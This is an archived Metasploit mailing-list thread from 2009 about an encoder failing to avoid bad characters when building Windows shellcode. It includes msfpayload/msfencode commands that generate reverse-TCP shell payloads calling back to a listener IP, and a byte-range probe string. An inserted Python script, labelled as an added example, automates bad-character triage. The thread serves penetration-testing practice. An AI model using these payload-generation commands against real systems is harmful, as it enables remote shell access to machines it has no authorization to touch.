Metasploit mailing list archives
Re: Encoder PexFnstenvSub
From: Pedro Drimel <pedrodrimel () gmail com>
Date: Mon, 23 Nov 2009 20:03:18 -0200
I used the manual way but it's still weird: I could get it working using framework-2.7 via msfweb but not through msfpayload/msfencode, even with the current framework 3.3.

Working: via msfweb - badchars: 0x00 0x0d

/* win32_reverse - EXITFUNC=seh LHOST=192.168.230.130 LPORT=4321 Size=312 Encoder=PexFnstenvSub http://metasploit.com */

Not working: framework 3.3

root@trackback:/pentest/exploits/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.230.130 LPORT=4321 EXITFUNC=seh R | ./msfencode -b '\x00\x0d' -e x86/fnstenv_mov -t c
[*] x86/fnstenv_mov succeeded with size 314 (iteration=1)
...
It triggers other badchars, even with EXITFUNC=thread; trying with the default options (LPORT=4444 and EXITFUNC=thread), it got other badchars (since it was working with 2.7 I gave up dealing with badchars). But the weirdest thing is that the 2.7 command line also does not work, it goes through some bad chars as well; I thought msfweb and msfpayload used the same code.

root@trackback:~/framework-2.7# ./msfpayload win32_reverse LHOST=192.168.230.130 LPORT=4321 EXITFNUC=seh r | ./msfencode -b '\x00\x0d' -e PexFnstenvSub -t c
[*] Using Msf::Encoder::PexFnstenvSub with final size of 312 bytes

I don't mind about 2.7, I would like to understand why this is not working on 3.3.
Please let me know any other test I can do in order to evaluate this. Thanks in advance.

Regards, Pedro.

2009/11/23 Rob Fuller <mubix () room362 com>:
Follow the crash step by step and compare chars, see which has changed once it hits the stack and add those to your bad chars list. (That's the manual way at least, not sure if there is a more advanced way.)

-- Rob Fuller | Mubix Room362.com | Hak5.org | TheAcademyPro.com

On Mon, Nov 23, 2009 at 11:00 AM, Pedro Drimel <pedrodrimel () gmail com> wrote:

It is actually a badchars issue. I compared the output I had with the one generated with the 2.7 version and it's different. Probably in the past I had to deal with badchars but I don't remember what I did. I tried to run the following into my buffer:

string = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e"
"\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d"
"\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b"
"\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a"
"\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9"
"\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8"
"\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
"\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

I put a breakpoint on the memory address which performs a JMP ESP but it didn't work; if I just put some NOPs or a calc.exe it works. Thanks in advance.

Regards, Pedro.
2009/11/23 HD Moore <hdm () metasploit com>:

On Mon, 2009-11-23 at 12:18 -0200, Pedro Drimel wrote:

Hello everyone, I used to use metasploit:55555 to generate payloads, however the server seems to be offline. I would like to get, through a command like msfpayload, the same encoder as "PexFnstenvSub"; I think it is x86/fnstenv_mov but it didn't work like the other one. What is the encoder PexFnstenvSub?

The metasploit:55555 server is just msfweb from Metasploit 2.7, you can download and run it yourself if you like, but there are really good reasons for it being offline:

1) The payloads do not work on newer versions of Windows
2) The payloads do not work with newer CPUs with NX support
3) The payloads have since been improved (reliability) and shrunk

The supported way is msfpayload with msfencode; the "pexfnstenvsub" encoder was not directly ported, but x86/fnstenv_mov is pretty close to it. In most cases you do not need to set the encoder, just set the bad character list in msfencode (-b '\x00'). If x86/fnstenv_mov is not working, please file a bug.

-HD

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
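The byte-comparison step Rob Fuller describes, written out as an added Python example (not code from the thread or from Metasploit): it rebuilds the \x01..\xff probe string from Pedro's message, diffs it against a dump of what actually landed in the buffer, and reports the bytes that were replaced, dropped or that truncated the copy, plus a check of whether an encoder's output still contains any of them. The dump used here is constructed inside the script to stand in for a real debugger capture.

```python
"""Bad-character triage: diff a probe string against a memory dump.
Added example, not code from the thread or from Metasploit."""
from typing import List

def build_probe(excluded: bytes = b"\x00") -> bytes:
    """Every byte value not already known to be bad; the default gives the
    \\x01..\\xff string from Pedro's message."""
    return bytes(b for b in range(256) if b not in excluded)

def find_bad_chars(sent: bytes, observed: bytes) -> List[int]:
    """Return the probe bytes that the input path replaced (later bytes stay
    aligned), dropped (later bytes shift left) or truncated the copy at.
    A truncation ends the scan: exclude the bytes found, rebuild the probe
    and re-run until the dump matches, exactly like the manual method."""
    bad: List[int] = []
    si = oi = 0
    while si < len(sent):
        if oi >= len(observed):                  # copy stopped here
            bad.append(sent[si])
            break
        if sent[si] == observed[oi]:
            si, oi = si + 1, oi + 1
            continue
        bad.append(sent[si])
        ahead = sent[si + 1:si + 4]              # resync on the next 3 bytes
        if observed[oi + 1:].startswith(ahead):  # replaced: both advance
            oi += 1
        elif not observed[oi:].startswith(ahead):
            break                                # garbled beyond this point
        si += 1                                  # dropped: only sent advances
    return bad

def payload_violations(payload: bytes, badchars: bytes) -> List[int]:
    """Offsets at which an encoded payload still contains a bad byte; a
    non-empty result is what 'triggers other badchars' looks like."""
    return [i for i, b in enumerate(payload) if b in badchars]

def constructed_dump(probe: bytes) -> bytes:
    """Stand-in for a debugger dump (constructed, not a real capture): the
    pretend target turns 0x0d into 0x0a, drops 0x20 and stops at 0x80."""
    out = bytearray()
    for b in probe:
        if b == 0x80:
            break
        if b != 0x20:
            out.append(0x0a if b == 0x0d else b)
    return bytes(out)
```

Run find_bad_chars on the first dump, exclude what it reports, rebuild the probe and repeat; the loop is done when it returns an empty list, and the accumulated set is what goes into msfencode's -b.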
Current thread:
- Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub HD Moore (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub Rob Fuller (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub HD Moore (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub Pedro Drimel (Nov 23)
- Re: Encoder PexFnstenvSub HD Moore (Nov 23)